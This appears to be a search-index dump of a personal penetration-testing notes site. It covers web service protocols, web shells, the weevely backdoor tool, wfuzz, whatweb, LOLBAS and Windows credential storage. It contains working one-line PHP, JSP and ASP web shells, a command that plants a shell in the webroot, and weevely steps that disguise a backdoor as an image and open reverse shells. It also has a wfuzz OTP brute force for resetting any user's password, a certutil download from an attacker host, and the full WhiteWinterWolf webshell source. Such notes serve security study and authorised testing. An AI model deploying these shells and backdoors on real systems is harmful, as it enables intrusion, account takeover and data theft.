        • SOAP (Simple Object Access Protocol): SOAP is a protocol for exchanging structured information in the implementation of web services. SOAP-based web services use XML as their message format and can be implemented using various programming languages.
        • JSON-RPC and XML-RPC: JSON-RPC and XML-RPC are lightweight protocols for remote procedure calls (RPC) using JSON or XML, respectively. These are simpler alternatives to SOAP for implementing web services.
        • REST (Representational State Transfer): REST is an architectural style for designing networked applications, and it uses HTTP as its communication protocol.
        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#xml-rpc","title":"XML-RPC","text":"
        • XML-RPC (Extensible Markup Language - Remote Procedure Call) created in 1998, is a protocol and a set of conventions for encoding and decoding data in XML format and using it for remote procedure calls (RPC).
        • It is a simple and lightweight protocol for enabling communication between software applications running on different systems, often over a network like the internet.
        • XML-RPC has been used as a precursor to more modern web service protocols like SOAP and REST.
• It works by sending HTTP requests that call a single method implemented on the remote system (a minimal request sketch follows this list).
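
A minimal sketch of such a request with curl (the endpoint is illustrative; system.listMethods is a common introspection method, exposed for example by WordPress's xmlrpc.php):

curl -s -X POST http://target/xmlrpc.php -d '<?xml version=\"1.0\"?><methodCall><methodName>system.listMethods</methodName></methodCall>'\n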
        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#json-rpc","title":"JSON-RPC","text":"
        • JSON-RPC (Remote Procedure Call) is a remote procedure call (RPC) protocol encoded in JSON (JavaScript Object Notation).
        • Like XML-RPC, JSON-RPC enables communication between software components or systems running on different machines or platforms.
        • JSON-RPC is known for its simplicity and ease of use and has become popular in web development and microservices architectures.
        • JSON-RPC is very similar to XML-RPC, however, it is usually used because it provides much more human-readable messages and takes less data to for communication.
        • JSON-RPC allows a client to invoke methods or functions on a remote server by sending a JSON object that specifies the method to call and its parameters.
• The message sent to invoke a method is a request with a single object serialized using JSON (a request sketch follows this list). It has three properties:
          • method: name of the method to invoke
          • params: an array of objects to pass as arguments
          • id: request ID used to match the responses/requests
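
For example, a minimal JSON-RPC request sent with curl (the endpoint and the getUser method are made up for illustration):

curl -s -X POST http://target/api -H 'Content-Type: application/json' -d '{\"method\": \"getUser\", \"params\": [42], \"id\": 1}'\n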
        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#soap","title":"SOAP","text":"

        SOAP (Simple Object Access Protocol) is a protocol for exchanging structured information in the implementation of web services. It is a protocol that defines a set of rules and conventions for structuring messages, defining remote procedure calls (RPC), and handling communication between software components over a network, typically the internet.

        SOAP is seen as the natural successor to XML-RPC and is known for its strong typing and extensive feature set, which includes security, reliability, and transaction support.

        SOAP Web Services may also provide a Web Services Definition language (WSDL) declaration that specifies how they may be used or interacted with.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#rest-restful-apis","title":"REST (RESTful APIs)","text":"

        REST, which stands for Representational State Transfer, is an architectural style for designing networked applications. It is not a protocol or technology itself but rather a set of principles and constraints that guide the design of web services and APIs (Application Programming Interfaces).

        REST is widely used for building scalable, stateless, and easy-to-maintain web services/APIs that can be accessed over the internet. REST web services generally use JSON or XML, but any other message transport format like plain-text can be used.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#wsdl-language-fundamentals","title":"WSDL Language Fundamentals","text":"

        WSDL, which stands for Web Services Description Language, is an XML-based language used to describe the functionality and interface of a web service, typically, SOAP-based web services (Simple Object Access Protocol).

        Versions: At the time of writing, WSDL can be distinguished in two main versions: 1.1 and 2.0. Although 2.0 is the current version, many web services still use WSDL 1.1.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#the-wsdl-document","title":"The WSDL Document","text":"

        A WSDL document is typically created to describe a SOAP-based web service. It defines the service's operations, their input and output message structures, and how they are bound to the SOAP protocol.

        First of all, it is important to know that WSDL documents have abstract and concrete definitions:

        • Abstract: describes what the service does, such as the operation provided, the input, the output and the fault messages used by each operation
        • Concrete: adds information about how the web service communicates and where the functionality is offered

        The WSDL document effectively documents the API provided by the service. The WSDL document serves as a contract between the service provider and consumers. It specifies how clients should construct SOAP requests to interact with the service. This contract defines the operations, their input parameters, and expected responses.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#wsdl-components","title":"WSDL components","text":"
        • Types: The <types> section defines the data types used in the web service. It typically includes XML Schema Definitions (XSD) that specify the structure and constraints of input and output data.
        • Message: The <message> element defines the data structures used in the messages exchanged between the client and the service. Messages can have multiple parts, each with a name and a type definition referencing the types defined in the <types> section.
        • Port Type: The <portType> element describes the operations that the web service supports. Each operation corresponds to a method or function that a client can invoke. It specifies the input and output messages for each operation. The operation object defined within a port type, represents a specific action that a service can perform. It specifies the name of the operation, the input message structure, the output message structure, and, optionally, fault messages that can occur during the operation.
        • Binding: The <binding> element specifies how the service operations are bound to a particular protocol, such as SOAP over HTTP. It defines details like the protocol, message encoding, and endpoint addresses.
        • Service: The <service> element provides information about the service itself. It includes the service's name and its endpoint address, which is the URL where clients can access the service.

        Instead of portType, WSDL v. 2.0 uses interface elements which define a set of operations representing an interaction between the client and the service. Each operation specifies the types of messages that the service can send or receive.

        Unlike the old portType, interface elements do not point to messages anymore (it does not exist in v. 2.0). Instead, they point to the schema elements contained within the types element

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#web-service-security-testing","title":"Web Service Security Testing","text":"

        Web service security testing is the process of evaluating the security of web services to identify vulnerabilities, weaknesses, and potential threats that could compromise the confidentiality, integrity, or availability of the service or its data.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#information-gathering-and-analysis","title":"Information Gathering and Analysis","text":"

        1. Identify the SOAP web services that need to be tested.

        2. Identify the WSDL file for the SOAP web service.

        Once the SOAP service has been identified, a way to discover WSDL files is by appending ?wsdl,.wsdl, ?disco or wsdl.aspx to the end of the service URL:
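
For example (the service path is illustrative):

curl -s \"http://target/service.php?wsdl\"\n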

        3. With WSDL document identified we may gather information about the web service endpoints, operations, and data exchanged.

        4. Understand the security requirements, authentication methods, and authorization mechanisms in place.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#authentication-and-authorization-testing","title":"Authentication and Authorization Testing","text":"

        Invoke hidden methods

        • Test the authentication mechanisms in place (e.g., username/password, tokens) to ensure they prevent unauthorized access.
        • Verify that users are correctly authenticated and authorized to access specific operations and resources.
        • Input Validation Testing:
          • Test for input validation vulnerabilities, such as SQL injection, cross-site scripting (XSS), and XML-based attacks.

        • Send malicious input data to the web service's input parameters to identify potential security weaknesses. For instance, command injection attacks:

        ","tags":["pentesting","webservices","soap"]},{"location":"web-services/#the-soapaction-header","title":"The SOAPAction header","text":"

        The SOAPAction header is a transport protocol header (either HTTP or JMS). It is transmitted with SOAP messages, and provides information about the intention of the web service request, to the service. The WSDL interface for a web service defines the SOAPAction header value used for each operation. Some web service implementations use the SOAPAction header to determine behavior.

        ","tags":["pentesting","webservices","soap"]},{"location":"web-shells/","title":"Web shells","text":"All about shells Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shell \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a\u00a0PHP\u00a0script to run a single command.

        Preconfigured webshells in Kali linux

        Go to /usr/share/webshells/

        Other resources

        See reverse shells

        A Web Shell is typically a web script that accepts our command through HTTP request parameters, executes our command, and prints its output back on the web page.

        A web shell script is typically a one-liner that is very short and can be memorized easily.

        ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#some-basic-web-shells","title":"Some basic web shells","text":"","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#php","title":"php","text":"
        <?php system($_REQUEST[\"cmd\"]); ?>\n
        • Pentesmonkey webshell.
        • WhiteWinterWolf webshell.
        ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#jsp","title":"jsp","text":"
        <% Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>\n
        ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#asp","title":"asp","text":"
        <% eval request(\"cmd\") %>\n
        ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#how-to-exploit-a-web-shell","title":"How to exploit a web shell","text":"","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#file-upload-vs-remote-code-execution","title":"File upload vs Remote code execution","text":"

        1. FILE UPLOAD: By abusing an upload feature, we place the web shell script into the remote host's web directory and execute it through the web browser.

        2. REMOTE CODE EXECUTION: By writing our one-liner shell to the webroot and accessing it over the web. This applies if we only have remote command execution as an exploit vector. Here is an example for bash:

        echo '<?php system($_REQUEST[\"cmd\"]); ?>' > /var/www/html/shell.php\n

        So, for the second way of exploitation, it's relevant to identify where the webroot is. The following are the default webroots for common web servers:

        | Web Server | Default Webroot |
        | --- | --- |
        | Apache | /var/www/html/ |
        | Nginx | /usr/local/nginx/html/ |
        | IIS | c:\\inetpub\\wwwroot\\ |
        | XAMPP | C:\\xampp\\htdocs\\ |

        ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#accessing-the-web-shell","title":"Accessing the web shell","text":"

        We can access the web shell using the browser or curl:

        curl http://SERVER_IP:PORT/shell.php?cmd=id\n

        A benefit of a web shell is that it bypasses firewall restrictions, as it does not open a new connection on a separate port but runs over the web port (80, 443, or whatever port the web application uses).

        ","tags":["pentesting","webshell","reverse-shells"]},{"location":"web-shells/#tools","title":"Tools","text":"

        About webshells.

        Laudanum

        nishang

        ","tags":["pentesting","webshell","reverse-shells"]},{"location":"webdav-wsgidav/","title":"WsgiDAV: A generic and extendable WebDAV server","text":"

        A generic and extendable WebDAV server written in Python and based on WSGI.

        ","tags":["pentesting","windows","server"]},{"location":"webdav-wsgidav/#installation","title":"Installation","text":"

        Download from github repo: https://github.com/mar10/wsgidav.

        sudo pip install wsgidav cheroot\n
        ","tags":["pentesting","windows","server"]},{"location":"webdav-wsgidav/#basis-usage","title":"Basis usage","text":"
        sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous \n
        ","tags":["pentesting","windows","server"]},{"location":"weevely/","title":"weevely","text":"

        Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free hosted ones.

        # Generate backdoor agent\nweevely generate <password> <path/to/save/your/phpBackdoorNamefile.php>\n# generate: creates the backdoor file\n# <password>: password used to access the agent\n\n# Then, upload the file to the victim's server and use weevely to connect\n# Run a terminal on the target\nweevely <URL> <password> [cmd]\n\n# Load a session file\nweevely session <path>\n

        Upload weevely PHP agent to a target web server to get remote shell access to it. It has more than 30 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target network.

        • Read the\u00a0Install\u00a0page to install weevely and its dependencies.
        • Read the\u00a0Getting Started\u00a0page to generate an agent and connect to it.
        • Browse the\u00a0Wiki\u00a0to read examples and use cases.
        ","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"weevely/#example-from-a-lab","title":"Example from a lab","text":"

        Generate a PHP web shell with Weevely and save it as an image:

        weevely generate secretpassword example.png \n

        Upload it to the application.

        Make the connection with weevely:

        weevely https://example.com/uploads/example.png/example.php secretpassword\n

        ","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"weevely/#weevely-commands","title":"weevely commands","text":"
        # Ask for help\nweevely> help\n

        In an attack you will probably need:

        # Read /etc/passwd with different techniques. A nice touch: weevely can bypass some restrictions on \"cat /etc/passwd\" by using the -vector attribute\n:audit_etcpasswd\n# -vector: posix_getpwuid, file, fread, file_get_contents, base64\n\n# Collect system information\n:system_info\n\n# Audit the file system for weak permissions\n:audit_filesystem\n\n# Execute shell commands. The cool part is that it bypasses the inability to run a bash command by tunnelling the command through a different language. To see available languages, use the -h attribute\n:shell_sh -vector <VectorValue> <Command>\n# -vector: choose to execute bash through php, python...\n\n# Download file from remote filesystem\n:file_download -vector <VECTORValue> <rpath> <lpath>\n# -vector: file, fread, file_get_contents, base64\n# rpath: remote path of the file you want to download\n# lpath: location where you want to save it\n\n# Upload file to remote filesystem\n:file_upload\n\n# Execute a reverse TCP shell\n:backdoor_reversetcp -shell <SHELLType> -no-autonnect -vector <VALUEofVector> <LHOST> <LPORT>\n:backdoor_reversetcp -h\n
        ","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"weevely/#weevely-complete-list-of-commands","title":"weevely complete list of commands","text":"Module Description :audit_filesystem Audit the file system for weak permissions. :audit_suidsgid Find files with SUID or SGID flags. :audit_disablefunctionbypass Bypass disable_function restrictions with mod_cgi and .htaccess. :audit_etcpasswd Read /etc/passwd with different techniques. :audit_phpconf Audit PHP configuration. :shell_sh Execute shell commands. :shell_su Execute commands with su. :shell_php Execute PHP commands. :system_extensions Collect PHP and webserver extension list. :system_info Collect system information. :system_procs List running processes. :backdoor_reversetcp Execute a reverse TCP shell. :backdoor_tcp Spawn a shell on a TCP port. :bruteforce_sql Bruteforce SQL database. :file_gzip Compress or expand gzip files. :file_clearlog Remove string from a file. :file_check Get attributes and permissions of a file. :file_upload Upload file to remote filesystem. :file_webdownload Download an URL. :file_tar Compress or expand tar archives. :file_download Download file from remote filesystem. :file_bzip2 Compress or expand bzip2 files. :file_edit Edit remote file on a local editor. :file_grep Print lines matching a pattern in multiple files. :file_ls List directory content. :file_cp Copy single file. :file_rm Remove remote file. :file_upload2web Upload file automatically to a web folder and get corres :file_zip Compress or expand zip files. :file_touch Change file timestamp. :file_find Find files with given names and attributes. :file_mount Mount remote filesystem using HTTPfs. :file_enum Check existence and permissions of a list of paths. :file_read Read remote file from the remote filesystem. :file_cd Change current working directory. :sql_console Execute SQL query or run console. :sql_dump Multi dbms mysqldump replacement. :net_mail Send mail. :net_phpproxy Install PHP proxy on the target. :net_curl Perform a curl-like HTTP request. :net_proxy Run local proxy to pivot HTTP/HTTPS browsing through the :net_scan TCP Port scan. :net_ifconfig Get network interfaces addresses.","tags":["pentesting\u00e7","web","pentesting","enumeration"]},{"location":"wfuzz/","title":"wfuzz","text":"","tags":["pentesting","web pentesting"]},{"location":"wfuzz/#basic-commands","title":"Basic commands","text":"
        wfuzz -d '{\"email\":\"hapihacker@hapihacker.com\",\"password\":\"PASSWORD\"}' -H 'Content-Type: application/json'-z file,/usr/share/wordlists/rockyou.txt -u http://localhost:8888/identity/api/auth/login --hc 500\n# -H to specify content-type headers. You use a -H flag for each header\n# -d allows you to include the POST Body data. \n# -u specifies the url\n# --hc/hl/hw/hh hide responses with the specified code/lines/words/chars. In our case, \"--hc 500\" hides 500 code responses.\n# -z specifies a payload   \n
        # Fuzzing an old API version which doesn't implement a request limit when resetting a password. It allows us to FUZZ the OTP and reset the password for any user.\nwfuzz -d '{\"email\":\"hapihacker@hapihacker.com\", \"otp\":\"FUZZ\", \"password\":\"NewPasswordreseted\"}' -H 'Content-Type: application/json' -z file,/usr/share/wordlists/SecLists-master/Fuzzing/4-digits-0000-9999.txt -u http://localhost:8888/identity/api/auth/v2/check-otp --hc 500\n

        Subdomain enumeration:

        wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H \"Host: FUZZ.nunchucks.htb\" --hl 546\n# -c: Color in output\n# --hc 404: Hide 404 code responses\n# -t 200: Concurrent threads\n# -u https://nunchucks.htb/: Target URL\n# -w /usr/share/dirb/wordlists/common.txt: Wordlist\n# -H \"Host: FUZZ.nunchucks.htb\": Header. \"FUZZ\" indicates the injection point for payloads\n# --hl 546: Filter out responses with a specific number of lines. In this case, 546\n
        ","tags":["pentesting","web pentesting"]},{"location":"wfuzz/#encoding","title":"Encoding","text":"
        # Check which wfuzz encoders are available\nwfuzz -e encoders\n\n# To use an encoder, add a comma to the payload and specify the encoder name\nwfuzz -z file,path/to/payload.txt,base64 http://hacking-example.com/api/v2/FUZZ\n\n# Using multiple encoders. Each payload will be processed in separate requests.\nwfuzz -z list,a,base64-md5-none\n# this results in three payloads: one encoded in base64, another in md5 and the last with none\n\n# Each payload can also be processed by multiple encoders, chained with @\nwfuzz -z file,payload1-payload2,base64@md5@random_upper -u http://hacking-example.com/api/v2/FUZZ\n
        ","tags":["pentesting","web pentesting"]},{"location":"wfuzz/#dealing-with-rate-limits-in-apis","title":"Dealing with rate limits (in APIs)","text":"
        -s  Specify a time delay between requests.\n-t Specify the concurrent number of connections\n
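        For example (endpoint and wordlist are illustrative):

        # Slow down to one request every half second, with at most 5 concurrent connections\nwfuzz -z file,/usr/share/wordlists/rockyou.txt -s 0.5 -t 5 -u http://example.com/api/v2/FUZZ\n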
        ","tags":["pentesting","web pentesting"]},{"location":"whatweb/","title":"whatweb","text":"

        WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.

        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"whatweb/#installation","title":"Installation","text":"

        Already installed in Kali.

        Download from: https://github.com/urbanadventurer/WhatWeb

        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"whatweb/#basic-usage","title":"Basic usage","text":"
        # version of web servers, supporting frameworks, and applications\nwhatweb $ip\nwhatweb <hostname>\n\n# Automate web application enumeration across a network.\nwhatweb --no-errors 10.10.10.0/24\n\n\nwhatweb -a3 https://www.example.com -v\n# -a3: aggression level 3\n# -v: verbose mode\n
        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"whitewinterwolf-webshell/","title":"WhiteWinterWolf php webshell","text":"

        Source: https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php.

        It is similar to the Antak webshell (ASPX, from the nishang project) but written in PHP. It generates a page on the server from which we can indicate the IP and port where we want to receive the output of the commands we enter.

        <?php\n/*******************************************************************************\n * Copyright 2017 WhiteWinterWolf\n * https://www.whitewinterwolf.com/tags/php-webshell/\n *\n * This file is part of wwolf-php-webshell.\n *\n * wwwolf-php-webshell is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program.  If not, see <http://www.gnu.org/licenses/>.\n ******************************************************************************/\n\n/*\n * Optional password settings.\n * Use the 'passhash.sh' script to generate the hash.\n * NOTE: the prompt value is tied to the hash!\n */\n$passprompt = \"WhiteWinterWolf's PHP webshell: \";\n$passhash = \"\";\n\nfunction e($s) { echo htmlspecialchars($s, ENT_QUOTES); }\n\nfunction h($s)\n{\n    global $passprompt;\n    if (function_exists('hash_hmac'))\n    {\n        return hash_hmac('sha256', $s, $passprompt);\n    }\n    else\n    {\n        return bin2hex(mhash(MHASH_SHA256, $s, $passprompt));\n    }\n}\n\nfunction fetch_fopen($host, $port, $src, $dst)\n{\n    global $err, $ok;\n    $ret = '';\n    if (strpos($host, '://') === false)\n    {\n        $host = 'http://' . $host;\n    }\n    else\n    {\n        $host = str_replace(array('ssl://', 'tls://'), 'https://', $host);\n    }\n    $rh = fopen(\"${host}:${port}${src}\", 'rb');\n    if ($rh !== false)\n    {\n        $wh = fopen($dst, 'wb');\n        if ($wh !== false)\n        {\n            $cbytes = 0;\n            while (! feof($rh))\n            {\n                $cbytes += fwrite($wh, fread($rh, 1024));\n            }\n            fclose($wh);\n            $ret .= \"${ok} Fetched file <i>${dst}</i> (${cbytes} bytes)<br />\";\n        }\n        else\n        {\n            $ret .= \"${err} Failed to open file <i>${dst}</i><br />\";\n        }\n        fclose($rh);\n    }\n    else\n    {\n        $ret = \"${err} Failed to open URL <i>${host}:${port}${src}</i><br />\";\n    }\n    return $ret;\n}\n\nfunction fetch_sock($host, $port, $src, $dst)\n{\n    global $err, $ok;\n    $ret = '';\n    $host = str_replace('https://', 'tls://', $host);\n    $s = fsockopen($host, $port);\n    if ($s)\n    {\n        $f = fopen($dst, 'wb');\n        if ($f)\n        {\n            $buf = '';\n            $r = array($s);\n            $w = NULL;\n            $e = NULL;\n            fwrite($s, \"GET ${src} HTTP/1.0\\r\\n\\r\\n\");\n            while (stream_select($r, $w, $e, 5) && !feof($s))\n            {\n                $buf .= fread($s, 1024);\n            }\n            $buf = substr($buf, strpos($buf, \"\\r\\n\\r\\n\") + 4);\n            fwrite($f, $buf);\n            fclose($f);\n            $ret .= \"${ok} Fetched file <i>${dst}</i> (\" . strlen($buf) . 
\" bytes)<br />\";\n        }\n        else\n        {\n            $ret .= \"${err} Failed to open file <i>${dst}</i><br />\";\n        }\n        fclose($s);\n    }\n    else\n    {\n        $ret .= \"${err} Failed to connect to <i>${host}:${port}</i><br />\";\n    }\n    return $ret;\n}\n\nini_set('log_errors', '0');\nini_set('display_errors', '1');\nerror_reporting(E_ALL);\n\nwhile (@ ob_end_clean());\n\nif (! isset($_SERVER))\n{\n    global $HTTP_POST_FILES, $HTTP_POST_VARS, $HTTP_SERVER_VARS;\n    $_FILES = &$HTTP_POST_FILES;\n    $_POST = &$HTTP_POST_VARS;\n    $_SERVER = &$HTTP_SERVER_VARS;\n}\n\n$auth = '';\n$cmd = empty($_POST['cmd']) ? '' : $_POST['cmd'];\n$cwd = empty($_POST['cwd']) ? getcwd() : $_POST['cwd'];\n$fetch_func = 'fetch_fopen';\n$fetch_host = empty($_POST['fetch_host']) ? $_SERVER['REMOTE_ADDR'] : $_POST['fetch_host'];\n$fetch_path = empty($_POST['fetch_path']) ? '' : $_POST['fetch_path'];\n$fetch_port = empty($_POST['fetch_port']) ? '80' : $_POST['fetch_port'];\n$pass = empty($_POST['pass']) ? '' : $_POST['pass'];\n$url = $_SERVER['REQUEST_URI'];\n$status = '';\n$ok = '&#9786; :';\n$warn = '&#9888; :';\n$err = '&#9785; :';\n\nif (! empty($passhash))\n{\n    if (function_exists('hash_hmac') || function_exists('mhash'))\n    {\n        $auth = empty($_POST['auth']) ? h($pass) : $_POST['auth'];\n        if (h($auth) !== $passhash)\n        {\n            ?>\n                <form method=\"post\" action=\"<?php e($url); ?>\">\n                    <?php e($passprompt); ?>\n                    <input type=\"password\" size=\"15\" name=\"pass\">\n                    <input type=\"submit\" value=\"Send\">\n                </form>\n            <?php\n            exit;\n        }\n    }\n    else\n    {\n        $status .= \"${warn} Authentication disabled ('mhash()' missing).<br />\";\n    }\n}\n\nif (! ini_get('allow_url_fopen'))\n{\n    ini_set('allow_url_fopen', '1');\n    if (! ini_get('allow_url_fopen'))\n    {\n        if (function_exists('stream_select'))\n        {\n            $fetch_func = 'fetch_sock';\n        }\n        else\n        {\n            $fetch_func = '';\n            $status .= \"${warn} File fetching disabled ('allow_url_fopen'\"\n                . \" disabled and 'stream_select()' missing).<br />\";\n        }\n    }\n}\nif (! ini_get('file_uploads'))\n{\n    ini_set('file_uploads', '1');\n    if (! ini_get('file_uploads'))\n    {\n        $status .= \"${warn} File uploads disabled.<br />\";\n    }\n}\nif (ini_get('open_basedir') && ! ini_set('open_basedir', ''))\n{\n    $status .= \"${warn} open_basedir = \" . ini_get('open_basedir') . \"<br />\";\n}\n\nif (! chdir($cwd))\n{\n  $cwd = getcwd();\n}\n\nif (! empty($fetch_func) && ! empty($fetch_path))\n{\n    $dst = $cwd . DIRECTORY_SEPARATOR . basename($fetch_path);\n    $status .= $fetch_func($fetch_host, $fetch_port, $fetch_path, $dst);\n}\n\nif (ini_get('file_uploads') && ! empty($_FILES['upload']))\n{\n    $dest = $cwd . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name']);\n    if (move_uploaded_file($_FILES['upload']['tmp_name'], $dest))\n    {\n        $status .= \"${ok} Uploaded file <i>${dest}</i> (\" . $_FILES['upload']['size'] . \" bytes)<br />\";\n    }\n}\n?>\n\n<form method=\"post\" action=\"<?php e($url); ?>\"\n    <?php if (ini_get('file_uploads')): ?>\n        enctype=\"multipart/form-data\"\n    <?php endif; ?>\n    >\n    <?php if (! 
empty($passhash)): ?>\n        <input type=\"hidden\" name=\"auth\" value=\"<?php e($auth); ?>\">\n    <?php endif; ?>\n    <table border=\"0\">\n        <?php if (! empty($fetch_func)): ?>\n            <tr><td>\n                <b>Fetch:</b>\n            </td><td>\n                host: <input type=\"text\" size=\"15\" id=\"fetch_host\" name=\"fetch_host\" value=\"<?php e($fetch_host); ?>\">\n                port: <input type=\"text\" size=\"4\" id=\"fetch_port\" name=\"fetch_port\" value=\"<?php e($fetch_port); ?>\">\n                path: <input type=\"text\" size=\"40\" id=\"fetch_path\" name=\"fetch_path\" value=\"\">\n            </td></tr>\n        <?php endif; ?>\n        <tr><td>\n            <b>CWD:</b>\n        </td><td>\n            <input type=\"text\" size=\"50\" id=\"cwd\" name=\"cwd\" value=\"<?php e($cwd); ?>\">\n            <?php if (ini_get('file_uploads')): ?>\n                <b>Upload:</b> <input type=\"file\" id=\"upload\" name=\"upload\">\n            <?php endif; ?>\n        </td></tr>\n        <tr><td>\n            <b>Cmd:</b>\n        </td><td>\n            <input type=\"text\" size=\"80\" id=\"cmd\" name=\"cmd\" value=\"<?php e($cmd); ?>\">\n        </td></tr>\n        <tr><td>\n        </td><td>\n            <sup><a href=\"#\" onclick=\"cmd.value=''; cmd.focus(); return false;\">Clear cmd</a></sup>\n        </td></tr>\n        <tr><td colspan=\"2\" style=\"text-align: center;\">\n            <input type=\"submit\" value=\"Execute\" style=\"text-align: right;\">\n        </td></tr>\n    </table>\n\n</form>\n<hr />\n\n<?php\nif (! empty($status))\n{\n    echo \"<p>${status}</p>\";\n}\n\necho \"<pre>\";\nif (! empty($cmd))\n{\n    echo \"<b>\";\n    e($cmd);\n    echo \"</b>\\n\";\n    if (DIRECTORY_SEPARATOR == '/')\n    {\n        $p = popen('exec 2>&1; ' . $cmd, 'r');\n    }\n    else\n    {\n        $p = popen('cmd /C \"' . $cmd . '\" 2>&1', 'r');\n    }\n    while (! feof($p))\n    {\n        echo htmlspecialchars(fread($p, 4096), ENT_QUOTES);\n        @ flush();\n    }\n}\necho \"</pre>\";\n\nexit;\n?>\n
        ","tags":["webshell","php"]},{"location":"window-detective/","title":"Window Detective - A tool to view windows properties in the system","text":"","tags":["pentesting","windows","thick client"]},{"location":"window-detective/#installation","title":"Installation","text":"

        Download it from: Window Detective

        ","tags":["pentesting","windows","thick client"]},{"location":"windows-binaries/","title":"Windows binaries - LOLBAS - LOLBAS","text":"

        The Windows equivalent of Linux SUID binaries is LOLBAS (Living Off The Land Binaries, Scripts and Libraries): https://lolbas-project.github.io/.
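        A classic example is certutil, a signed Windows binary that can be abused to download files onto the target:

        # Download a file using a trusted, signed Windows binary (URL and paths are examples)\ncertutil.exe -urlcache -split -f http://<ATTACKER_IP>/shell.exe C:\\Windows\\Temp\\shell.exe\n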

        ","tags":["pentesting","privilege escalation","windows"]},{"location":"windows-credentials-storage/","title":"Windows credentials storage","text":"

        Microsoft documentation.

        ","tags":["windows"]},{"location":"windows-credentials-storage/#how-login-happens","title":"How login happens","text":"

        The Local Security Authority (LSA) is a protected subsystem that authenticates users and logs them into the local computer.

        Source: HackTheBox Academy. Module Password attacks.

        ","tags":["windows"]},{"location":"windows-credentials-storage/#lsass","title":"LSASS","text":"

        Local Security Authority Subsystem Service (LSASS) is a collection of many modules and has access to all authentication processes that can be found in %SystemRoot%\\System32\\Lsass.exe. This service is responsible for the local system security policy, user authentication, and sending security audit logs to the Event log.

        The LSA has the following components:

        Netlogon.dll . The Net Logon service. Net Logon maintains the computer's secure channel to a domain controller. It passes the user's credentials through a secure channel to the domain controller and returns the domain security identifiers and user rights for the user. In Windows\u00a02000, the Net Logon service uses DNS to resolve names to the Internet Protocol (IP) addresses of domain controllers. Net Logon is the replication protocol for Microsoft\u00ae Windows\u00a0NT\u00ae version\u00a04.0 primary domain controllers and backup domain controllers.

        Msv1_0.dll . The NTLM authentication protocol. This protocol authenticates clients that do not use Kerberos authentication.

        Schannel.dll . The Secure Sockets Layer (SSL) authentication protocol. This protocol provides authentication over an encrypted channel instead of a less-secure clear channel.

        Kerberos.dll . The Kerberos\u00a0v5 authentication protocol.

        Kdcsvc.dll . The Kerberos Key Distribution Center (KDC) service, which is responsible for granting ticket-granting tickets to clients.

        Lsasrv.dll . The LSA server service, which enforces security policies.

        Samsrv.dll . The Security Accounts Manager (SAM), which stores local security accounts, enforces locally stored policies, and supports APIs.

        Ntdsa.dll . The directory service module, which supports the Windows\u00a02000 replication protocol and Lightweight Directory Access Protocol (LDAP), and manages partitions of data.

        Secur32.dll . The multiple authentication provider that holds all of the components together.

        Upon initial logon, LSASS will:

        • Cache credentials locally in memory
        • Create access tokens
        • Enforce security policies
        • Write to Windows security log
        ","tags":["windows"]},{"location":"windows-credentials-storage/#gina","title":"GINA","text":"

        Each interactive logon session creates a separate instance of the Winlogon service. The Graphical Identification and Authentication (GINA) architecture is loaded into the process area used by Winlogon, receives and processes the credentials, and invokes the authentication interfaces via the LSALogonUser function.

        ","tags":["windows"]},{"location":"windows-credentials-storage/#sam-database","title":"SAM Database","text":"

        The Security Account Manager (SAM) is a database file in Windows operating systems that stores users' passwords. It can be used to authenticate local and remote users. User passwords are stored in hash format in a registry structure as either an LM hash or an NTLM hash. This file is located at %SystemRoot%\\system32\\config\\SAM and is mounted on HKLM\\SAM.

        SYSTEM level permissions are required to view it.

        Windows systems can be assigned to either a workgroup or domain during setup. If the system has been assigned to a workgroup, it handles the SAM database locally and stores all existing users locally in this database. However, if the system has been joined to a domain, the Domain Controller (DC) must validate the credentials from the Active Directory database (ntds.dit), which is stored in %SystemRoot%\\NTDS\\ntds.dit.

